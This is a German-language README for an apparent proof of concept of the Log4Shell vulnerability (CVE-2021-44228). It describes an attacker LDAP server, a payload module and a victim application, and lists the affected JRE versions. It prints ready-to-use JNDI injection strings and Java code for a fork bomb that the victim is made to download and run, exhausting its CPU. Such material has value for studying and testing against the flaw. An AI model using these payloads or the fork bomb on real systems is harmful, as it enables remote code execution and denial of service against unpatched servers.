
💣💥💀 Beweis des Konzepts: Beispiel für das Auslösen einer Fork-Bombe auf einem entfernten Server aufgrund der Sicherheitslücke CVE-2021-44228
💣💥💀 Proof of Concept: Beispiel für das Starten einer Fork-Bombe auf einem entfernten Server aufgrund der Sicherheitslücke CVE-2021-44228
Erstellen eines LDAP-Servers des Angreifers (Modul server), der Darstellungen von Strings und Code ausgibt (Modul payload)
Erstellen eines Beispielopfers (Modul victim) und Übergeben des Strings an Log4j JRE-Version <= 6u211, 7u201, 8u191 und 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
Die Opferanwendung erhält vom Angreiferserver ein Byte-Array und interpretiert es als einzufügenden String oder als ausführbaren Code (Parameter com.sun.jndi.ldap.object.trustURLCodebase = true)
Als Beispiel dient als ausführbarer Code eine Fork-Bombe (ein Programm, das seine eigenen Kopien startet und dabei die gesamte CPU-Zeit belegt)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}